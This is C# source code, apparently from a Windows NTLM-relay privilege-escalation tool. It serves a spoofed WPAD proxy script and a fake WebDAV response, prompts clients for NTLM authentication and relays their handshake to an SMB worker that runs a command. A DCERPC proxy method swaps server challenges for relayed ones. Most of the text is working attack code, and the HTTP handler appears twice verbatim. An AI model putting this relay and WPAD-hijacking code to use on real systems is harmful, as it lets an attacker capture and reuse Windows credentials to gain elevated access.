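/// <summary>
/// HTTP side of the NTLM relay. Requests are routed by method and URL:
///  - a URL containing "GETHASHES" runs the NTLM handshake with the client: the first
///    request gets a bare "WWW-Authenticate: NTLM" 401; the client's Type 1 (NEGOTIATE)
///    is pushed to the SMB relay thread through ntlmQueue and the challenge that thread
///    obtains is returned in a second 401; the client's Type 3 (AUTHENTICATE) is then
///    queued to the relay thread, whose single status byte (99 = relay finished) decides
///    whether 'finished' is set or the state is reset for another attempt;
///  - a request for wpad.dat (by IP or by the "wpad" name) serves a PAC script that
///    sends everything except "localhost" and the wpad_exclude entries to 127.0.0.1:80;
///  - any other GET-like request, while no relay attempt is in flight, is redirected to
///    a fresh http://localhost:{srvPort}/GETHASHES{n} URL;
///  - PROPFIND http://localhost/test answers a WebDAV 207 describing /test/ as a
///    collection; every other PROPFIND and every other method gets a 404.
/// Relay progress lives in the fields 'state' (0: waiting for Type 1, 1: waiting for
/// Type 3) and 'workingUri' (the GETHASHES URL the current attempt is bound to; only
/// NTLM tokens arriving for that exact URL advance the handshake).
/// </summary>
/// <param name="sender">Unused; present for the event-handler signature.</param>
/// <param name="e">Request/response pair of the connection being served.</param>
public void recvRequest(object sender, HttpRequestEventArgs e)
{
    using (var writer = new StreamWriter(e.Response.OutputStream))
    {
        HttpRequest request = e.Request;
        HttpResponse response = e.Response;
        System.Collections.Specialized.NameValueCollection headers = request.Headers;
        // Both values are consulted in every branch below; compute them once.
        string uri = request.Url.AbsoluteUri.ToString();
        string method = request.HttpMethod.ToLower();
        Console.WriteLine("Got Request: " + request.HttpMethod + " " + uri + "!");

        bool getLikeMethod = method.Equals("head") || method.Equals("get") || method.Equals("post")
            || method.Equals("options") || method.Equals("put");

        if (getLikeMethod)
        {
            if (uri.Contains("GETHASHES"))
            {
                Console.WriteLine("Sending 401...");
                if (headers["Authorization"] == null && workingUri == null)
                {
                    // Step 0: no credentials yet and no attempt in flight — ask the client for NTLM.
                    Console.WriteLine("Got request for hashes...");
                    response.Headers.Add("WWW-Authenticate", "NTLM");
                    response.StatusCode = 401;
                    state = 0;
                }
                else
                {
                    String authHeader = headers["Authorization"];
                    byte[] ntlmBlock = getNtlmBlock(authHeader);
                    // One relay attempt at a time: bind to the first GETHASHES URL that carries
                    // an NTLM token and ignore tokens that arrive for any other URL.
                    if (ntlmBlock != null && (workingUri == null || workingUri == uri))
                    {
                        workingUri = uri;
                        if (state == 0)
                        {
                            // Step 1: forward the client's Type 1 to the SMB relay thread and wait
                            // for the challenge it obtained from the target.
                            Console.WriteLine("Parsing initial NTLM auth...\n" + authHeader);
                            smbRelayThread = new Thread(() => smbRelay.startSMBRelay(ntlmQueue, this.cmd));
                            ntlmQueue.Clear();
                            smbRelayThread.Start();
                            ntlmQueue.Enqueue(ntlmBlock);
                            // NOTE(review): no timeout — if the relay thread dies without
                            // signalling, this handler thread blocks here forever.
                            Config.signalHandlerClient.WaitOne();
                            byte[] challenge = ntlmQueue.Dequeue();
                            if (challenge == null)
                            {
                                // Fix: the challenge used to be base64-encoded for the log line
                                // *before* the null check, so a missing challenge threw out of
                                // the handler instead of reaching this branch.
                                Console.WriteLine("No SMB challenge received from relay thread");
                            }
                            else
                            {
                                string challengeB64 = Convert.ToBase64String(challenge);
                                Console.WriteLine("Got SMB challenge " + challengeB64);
                                response.Headers.Add("WWW-Authenticate", "NTLM " + challengeB64);
                                state = state + 1;
                                response.StatusCode = 401;
                            }
                        }
                        else if (state == 1 && uri.Equals(workingUri))
                        {
                            // Step 2: the client's Type 3 (AUTHENTICATE) — hand it to the relay
                            // thread and wait for its verdict.
                            Console.WriteLine("Parsing final auth...");
                            // NTLMSSP: 8-byte "NTLMSSP\0" signature, then a 4-byte little-endian
                            // MessageType, so byte 8 is the type (3 = AUTHENTICATE). Guard the
                            // index so a short token cannot throw here.
                            if (ntlmBlock.Length > 8 && ntlmBlock[8] == 3)
                            {
                                Console.WriteLine(Convert.ToBase64String(ntlmBlock));
                            }
                            ntlmQueue.Enqueue(ntlmBlock);
                            Config.signalHandler.Set();
                            // The client is told 200 regardless of how the relay turns out.
                            response.StatusCode = 200;
                            state = state + 1;
                            Config.signalHandlerClient.WaitOne();
                            byte[] checkStatus = ntlmQueue.Dequeue();
                            // A status byte of 99 means the relay thread completed its job. A
                            // null/empty status used to throw here and leave the handler stuck in
                            // state 2 with workingUri set; treat it as a failed attempt instead.
                            bool relayFinished = checkStatus != null && checkStatus.Length > 0 && checkStatus[0] == 99;
                            if (relayFinished)
                            {
                                writer.Close();
                                // NOTE(review): Thread.Abort is unsupported on .NET Core/5+
                                // (PlatformNotSupportedException); this assumes .NET Framework.
                                smbRelayThread.Abort();
                                finished.Set();
                                return;
                            }
                            // Failed attempt: tear the relay down and allow a fresh handshake.
                            workingUri = null;
                            smbRelayThread.Abort();
                            ntlmQueue = new Queue<byte[]>();
                            smbRelay = new SMBRelay();
                            writer.Close();
                            state = 0;
                        }
                    }
                }
                writer.Close();
                return;
            }
            else if (uri.Equals("http://127.0.0.1/wpad.dat") || uri.Equals("http://wpad/wpad.dat"))
            {
                // Serve a PAC file that proxies everything through this listener except
                // localhost and the configured exclusions. Entries of wpad_exclude are spliced
                // into the JavaScript verbatim — an entry containing a double quote would break
                // the script, so the list is assumed to be operator-controlled.
                Console.WriteLine("Spoofing wpad...");
                response.StatusCode = 200;
                String responseTxt = "function FindProxyForURL(url,host){if (dnsDomainIs(host, \"localhost\")) return \"DIRECT\";";
                foreach (string excluded in wpad_exclude)
                {
                    responseTxt = responseTxt + "if (dnsDomainIs(host, \"" + excluded + "\")) return \"DIRECT\";";
                }
                responseTxt = responseTxt + "return \"PROXY 127.0.0.1:80\";}";
                writer.Write(responseTxt);
            }
            else if (workingUri == null && !uri.Contains("wpad") && !uri.Contains("favicon"))
            {
                // Not a relay URL and no attempt in flight: bounce the client to a unique
                // GETHASHES URL. The number only keeps per-attempt URLs distinct; it is not a
                // secret, so System.Random is adequate here.
                Random rnd = new Random();
                int sess = rnd.Next(1, 1000000);
                response.Headers.Add("Location", "http://localhost:" + srvPort + "/GETHASHES" + sess);
                Console.WriteLine("Redirecting to target.." + response.Headers["Location"]);
                response.StatusCode = 302;
                writer.Close();
            }
        }
        else if (method.Equals("propfind"))
        {
            if (uri.Equals("http://localhost/test"))
            {
                // Advertise /test/ as a lockable WebDAV collection so the client proceeds
                // with the DAV session (and its authentication) against this listener.
                Console.WriteLine("Got PROPFIND for /test... Responding");
                response.StatusCode = 207;
                response.ContentType = "application/xml";
                writer.Write("<?xml version='1.0' encoding='UTF-8'?><ns0:multistatus xmlns:ns0=\"DAV:\"><ns0:response><ns0:href>/test/</ns0:href><ns0:propstat><ns0:prop><ns0:resourcetype><ns0:collection /></ns0:resourcetype><ns0:creationdate>2015-08-03T14:53:38Z</ns0:creationdate><ns0:getlastmodified>Tue, 11 Aug 2015 15:48:25 GMT</ns0:getlastmodified><ns0:displayname>test</ns0:displayname><ns0:lockdiscovery /><ns0:supportedlock><ns0:lockentry><ns0:lockscope><ns0:exclusive /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry><ns0:lockentry><ns0:lockscope><ns0:shared /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry></ns0:supportedlock></ns0:prop><ns0:status>HTTP/1.1 200 OK</ns0:status></ns0:propstat></ns0:response></ns0:multistatus>");
                writer.Close();
            }
            else
            {
                Console.WriteLine("Got PROPFIND for " + uri + " returning 404");
                response.StatusCode = 404;
                writer.Close();
            }
        }
        else
        {
            Console.WriteLine("Got " + request.HttpMethod + " for " + uri + " replying 404");
            response.StatusCode = 404;
            writer.Close();
        }
    }
}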
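/// <summary>
/// HTTP side of the NTLM relay. Requests are routed by method and URL:
///  - a URL containing "GETHASHES" runs the NTLM handshake with the client: the first
///    request gets a bare "WWW-Authenticate: NTLM" 401; the client's Type 1 (NEGOTIATE)
///    is pushed to the SMB relay thread through ntlmQueue and the challenge that thread
///    obtains is returned in a second 401; the client's Type 3 (AUTHENTICATE) is then
///    queued to the relay thread, whose single status byte (99 = relay finished) decides
///    whether 'finished' is set or the state is reset for another attempt;
///  - a request for wpad.dat (by IP or by the "wpad" name) serves a PAC script that
///    sends everything except "localhost" and the wpad_exclude entries to 127.0.0.1:80;
///  - any other GET-like request, while no relay attempt is in flight, is redirected to
///    a fresh http://localhost:{srvPort}/GETHASHES{n} URL;
///  - PROPFIND http://localhost/test answers a WebDAV 207 describing /test/ as a
///    collection; every other PROPFIND and every other method gets a 404.
/// Relay progress lives in the fields 'state' (0: waiting for Type 1, 1: waiting for
/// Type 3) and 'workingUri' (the GETHASHES URL the current attempt is bound to; only
/// NTLM tokens arriving for that exact URL advance the handshake).
/// </summary>
/// <param name="sender">Unused; present for the event-handler signature.</param>
/// <param name="e">Request/response pair of the connection being served.</param>
public void recvRequest(object sender, HttpRequestEventArgs e)
{
    using (var writer = new StreamWriter(e.Response.OutputStream))
    {
        HttpRequest request = e.Request;
        HttpResponse response = e.Response;
        System.Collections.Specialized.NameValueCollection headers = request.Headers;
        // Both values are consulted in every branch below; compute them once.
        string uri = request.Url.AbsoluteUri.ToString();
        string method = request.HttpMethod.ToLower();
        Console.WriteLine("Got Request: " + request.HttpMethod + " " + uri + "!");

        bool getLikeMethod = method.Equals("head") || method.Equals("get") || method.Equals("post")
            || method.Equals("options") || method.Equals("put");

        if (getLikeMethod)
        {
            if (uri.Contains("GETHASHES"))
            {
                Console.WriteLine("Sending 401...");
                if (headers["Authorization"] == null && workingUri == null)
                {
                    // Step 0: no credentials yet and no attempt in flight — ask the client for NTLM.
                    Console.WriteLine("Got request for hashes...");
                    response.Headers.Add("WWW-Authenticate", "NTLM");
                    response.StatusCode = 401;
                    state = 0;
                }
                else
                {
                    String authHeader = headers["Authorization"];
                    byte[] ntlmBlock = getNtlmBlock(authHeader);
                    // One relay attempt at a time: bind to the first GETHASHES URL that carries
                    // an NTLM token and ignore tokens that arrive for any other URL.
                    if (ntlmBlock != null && (workingUri == null || workingUri == uri))
                    {
                        workingUri = uri;
                        if (state == 0)
                        {
                            // Step 1: forward the client's Type 1 to the SMB relay thread and wait
                            // for the challenge it obtained from the target.
                            Console.WriteLine("Parsing initial NTLM auth...\n" + authHeader);
                            smbRelayThread = new Thread(() => smbRelay.startSMBRelay(ntlmQueue, this.cmd));
                            ntlmQueue.Clear();
                            smbRelayThread.Start();
                            ntlmQueue.Enqueue(ntlmBlock);
                            // NOTE(review): no timeout — if the relay thread dies without
                            // signalling, this handler thread blocks here forever.
                            Config.signalHandlerClient.WaitOne();
                            byte[] challenge = ntlmQueue.Dequeue();
                            if (challenge == null)
                            {
                                // Fix: the challenge used to be base64-encoded for the log line
                                // *before* the null check, so a missing challenge threw out of
                                // the handler instead of reaching this branch.
                                Console.WriteLine("No SMB challenge received from relay thread");
                            }
                            else
                            {
                                string challengeB64 = Convert.ToBase64String(challenge);
                                Console.WriteLine("Got SMB challenge " + challengeB64);
                                response.Headers.Add("WWW-Authenticate", "NTLM " + challengeB64);
                                state = state + 1;
                                response.StatusCode = 401;
                            }
                        }
                        else if (state == 1 && uri.Equals(workingUri))
                        {
                            // Step 2: the client's Type 3 (AUTHENTICATE) — hand it to the relay
                            // thread and wait for its verdict.
                            Console.WriteLine("Parsing final auth...");
                            // NTLMSSP: 8-byte "NTLMSSP\0" signature, then a 4-byte little-endian
                            // MessageType, so byte 8 is the type (3 = AUTHENTICATE). Guard the
                            // index so a short token cannot throw here.
                            if (ntlmBlock.Length > 8 && ntlmBlock[8] == 3)
                            {
                                Console.WriteLine(Convert.ToBase64String(ntlmBlock));
                            }
                            ntlmQueue.Enqueue(ntlmBlock);
                            Config.signalHandler.Set();
                            // The client is told 200 regardless of how the relay turns out.
                            response.StatusCode = 200;
                            state = state + 1;
                            Config.signalHandlerClient.WaitOne();
                            byte[] checkStatus = ntlmQueue.Dequeue();
                            // A status byte of 99 means the relay thread completed its job. A
                            // null/empty status used to throw here and leave the handler stuck in
                            // state 2 with workingUri set; treat it as a failed attempt instead.
                            bool relayFinished = checkStatus != null && checkStatus.Length > 0 && checkStatus[0] == 99;
                            if (relayFinished)
                            {
                                writer.Close();
                                // NOTE(review): Thread.Abort is unsupported on .NET Core/5+
                                // (PlatformNotSupportedException); this assumes .NET Framework.
                                smbRelayThread.Abort();
                                finished.Set();
                                return;
                            }
                            // Failed attempt: tear the relay down and allow a fresh handshake.
                            workingUri = null;
                            smbRelayThread.Abort();
                            ntlmQueue = new Queue<byte[]>();
                            smbRelay = new SMBRelay();
                            writer.Close();
                            state = 0;
                        }
                    }
                }
                writer.Close();
                return;
            }
            else if (uri.Equals("http://127.0.0.1/wpad.dat") || uri.Equals("http://wpad/wpad.dat"))
            {
                // Serve a PAC file that proxies everything through this listener except
                // localhost and the configured exclusions. Entries of wpad_exclude are spliced
                // into the JavaScript verbatim — an entry containing a double quote would break
                // the script, so the list is assumed to be operator-controlled.
                Console.WriteLine("Spoofing wpad...");
                response.StatusCode = 200;
                String responseTxt = "function FindProxyForURL(url,host){if (dnsDomainIs(host, \"localhost\")) return \"DIRECT\";";
                foreach (string excluded in wpad_exclude)
                {
                    responseTxt = responseTxt + "if (dnsDomainIs(host, \"" + excluded + "\")) return \"DIRECT\";";
                }
                responseTxt = responseTxt + "return \"PROXY 127.0.0.1:80\";}";
                writer.Write(responseTxt);
            }
            else if (workingUri == null && !uri.Contains("wpad") && !uri.Contains("favicon"))
            {
                // Not a relay URL and no attempt in flight: bounce the client to a unique
                // GETHASHES URL. The number only keeps per-attempt URLs distinct; it is not a
                // secret, so System.Random is adequate here.
                Random rnd = new Random();
                int sess = rnd.Next(1, 1000000);
                response.Headers.Add("Location", "http://localhost:" + srvPort + "/GETHASHES" + sess);
                Console.WriteLine("Redirecting to target.." + response.Headers["Location"]);
                response.StatusCode = 302;
                writer.Close();
            }
        }
        else if (method.Equals("propfind"))
        {
            if (uri.Equals("http://localhost/test"))
            {
                // Advertise /test/ as a lockable WebDAV collection so the client proceeds
                // with the DAV session (and its authentication) against this listener.
                Console.WriteLine("Got PROPFIND for /test... Responding");
                response.StatusCode = 207;
                response.ContentType = "application/xml";
                writer.Write("<?xml version='1.0' encoding='UTF-8'?><ns0:multistatus xmlns:ns0=\"DAV:\"><ns0:response><ns0:href>/test/</ns0:href><ns0:propstat><ns0:prop><ns0:resourcetype><ns0:collection /></ns0:resourcetype><ns0:creationdate>2015-08-03T14:53:38Z</ns0:creationdate><ns0:getlastmodified>Tue, 11 Aug 2015 15:48:25 GMT</ns0:getlastmodified><ns0:displayname>test</ns0:displayname><ns0:lockdiscovery /><ns0:supportedlock><ns0:lockentry><ns0:lockscope><ns0:exclusive /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry><ns0:lockentry><ns0:lockscope><ns0:shared /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry></ns0:supportedlock></ns0:prop><ns0:status>HTTP/1.1 200 OK</ns0:status></ns0:propstat></ns0:response></ns0:multistatus>");
                writer.Close();
            }
            else
            {
                Console.WriteLine("Got PROPFIND for " + uri + " returning 404");
                response.StatusCode = 404;
                writer.Close();
            }
        }
        else
        {
            Console.WriteLine("Got " + request.HttpMethod + " for " + uri + " replying 404");
            response.StatusCode = 404;
            writer.Close();
        }
    }
}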
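/// <summary>
/// Inspects one buffer flowing through the DCERPC proxy for an embedded NTLMSSP message
/// and drives the relay state machine from it:
///  - Type 1 (NEGOTIATE): handed to the token-relay thread when enable_token is set,
///    otherwise to the SMB-relay thread; the challenge the worker obtains is cached in
///    the 'challenge' field;
///  - Type 2 (CHALLENGE) from the real RPC server: rewritten with the cached challenge via
///    replaceChallenge, except that the very first one is passed through untouched while
///    dropFirst is set;
///  - Type 3 (AUTHENTICATE): forwarded to the active worker; a status byte of 99 coming
///    back means the relay is done (DCERPCNtlmHandler.finished is set and the worker
///    aborted); otherwise, on the token path only, the queues and counters are reset.
/// </summary>
/// <param name="buf">Raw bytes read from the proxied connection.</param>
/// <returns>buf unchanged, or — in the Type 2 case — the buffer with the challenge swapped
/// in. Any exception is logged and the original buffer is returned so the proxied
/// connection keeps flowing.</returns>
private byte[] doNTLMMagic(byte[] buf)
{
    byte[] ret_bytes = buf;

    // Create (but do not yet start) the relay workers on first use.
    // NOTE(review): smbRelayThread is never reset to null once it has run, so a second
    // Type 1 on the SMB path would call Start() on a completed Thread (ThreadStateException,
    // caught below) — confirm one relay attempt per handler instance is the intent.
    if (smbRelayThread == null)
    {
        SMBRelay smbRelay = new SMBRelay();
        // NOTE(review): the worker reads NTLMRelayingProxy.ntlmQueue while this method
        // writes 'ntlmQueue' — presumably the same static queue; verify.
        smbRelayThread = new Thread(() => smbRelay.startSMBRelay(NTLMRelayingProxy.ntlmQueue, cmd));
    }
    if (tokenRelayThread == null)
    {
        SSPIHelper tokenRelay = new SSPIHelper();
        tokenRelayThread = new Thread(() => tokenRelay.TokenRelay(new_ntlmQueueIn, new_ntlmQueueOut));
    }

    try
    {
        byte[] ntlm_bytes = NTLMExtract(buf);
        // NTLMSSP layout: 8-byte "NTLMSSP\0" signature followed by a 4-byte little-endian
        // MessageType, so byte 8 carries the type. A missing or truncated message is not
        // ours to handle; previously a short array threw IndexOutOfRangeException into the
        // catch below, which gave the same pass-through but with a stack trace on stdout.
        if (ntlm_bytes == null || ntlm_bytes.Length <= 8)
        {
            return ret_bytes;
        }

        byte messageType = ntlm_bytes[8];
        if (messageType == 1)
        {
            if (enable_token != null)
            {
                Console.WriteLine("GOT TYPE1 MESSAGE TOKEN-RELAY!");
                new_ntlmQueueIn.Add(ntlm_bytes);
                tokenRelayThread.Start();
                challenge = new_ntlmQueueOut.Take();
            }
            else if (!smbRelayThread.IsAlive)
            {
                Console.WriteLine("GOT TYPE1 MESSAGE");
                ntlmQueue.Enqueue(ntlm_bytes);
                smbRelayThread.Start();
                // NOTE(review): no timeout on this wait — if the relay thread dies without
                // signalling, the proxy thread blocks here indefinitely.
                Config.signalHandlerClient.WaitOne();
                challenge = ntlmQueue.Dequeue();
            }
        }
        else if (messageType == 2)
        {
            Console.WriteLine("GOT TYPE2 MESSAGE (CHALLENGE) from RPCs");
            // With dropFirst the first server challenge is let through untouched; every
            // later one is swapped for the challenge cached from the relay target.
            if (challengeCount > 0 || !dropFirst)
            {
                ret_bytes = replaceChallenge(buf, challenge);
            }
            challengeCount = challengeCount + 1;
        }
        else if (messageType == 3)
        {
            if (enable_token != null)
            {
                Console.WriteLine("GOT TYPE3 MESSAGE (AUTH) TOKEN-RELAY");
                new_ntlmQueueIn.Add(ntlm_bytes);
                byte[] checkStatus = new_ntlmQueueOut.Take();
                // Guarded so a null/empty status is treated as "not finished" and hits the
                // reset branch instead of throwing and leaving the worker state half-torn-down.
                bool relayFinished = checkStatus != null && checkStatus.Length > 0 && checkStatus[0] == 99;
                if (relayFinished)
                {
                    Thread.Sleep(500); // give the worker a moment to finish before aborting it
                    // NOTE(review): Thread.Abort is unsupported on .NET Core/5+
                    // (PlatformNotSupportedException); this assumes .NET Framework.
                    tokenRelayThread.Abort();
                    DCERPCNtlmHandler.finished.Set();
                }
                else
                {
                    new_ntlmQueueIn = new BlockingCollection<byte[]>();
                    new_ntlmQueueOut = new BlockingCollection<byte[]>();
                    challengeCount = 0;
                    tokenRelayThread = null;
                }
            }
            else
            {
                Console.WriteLine("GOT TYPE3 MESSAGE (AUTH)");
                ntlmQueue.Enqueue(ntlm_bytes);
                Config.signalHandler.Set();
                Config.signalHandlerClient.WaitOne();
                byte[] checkStatus = ntlmQueue.Dequeue();
                Config.signalHandler.Set();
                bool relayFinished = checkStatus != null && checkStatus.Length > 0 && checkStatus[0] == 99;
                if (relayFinished)
                {
                    Thread.Sleep(500); // give the worker a moment to finish before aborting it
                    smbRelayThread.Abort();
                    // NOTE(review): tokenRelayThread was created above but never started on
                    // this path; if Abort() throws for an unstarted thread here, finished.Set()
                    // below is skipped — verify on the target runtime.
                    tokenRelayThread.Abort();
                    DCERPCNtlmHandler.finished.Set();
                }
                // No reset on failure here (unlike the token path); see the NOTE at the top
                // about smbRelayThread never being recreated.
            }
        }
    }
    catch (Exception e)
    {
        // Best-effort: log and let the original bytes through so the proxied connection
        // is not torn down by a relay-side failure.
        Console.WriteLine(e);
    }
    return ret_bytes;
}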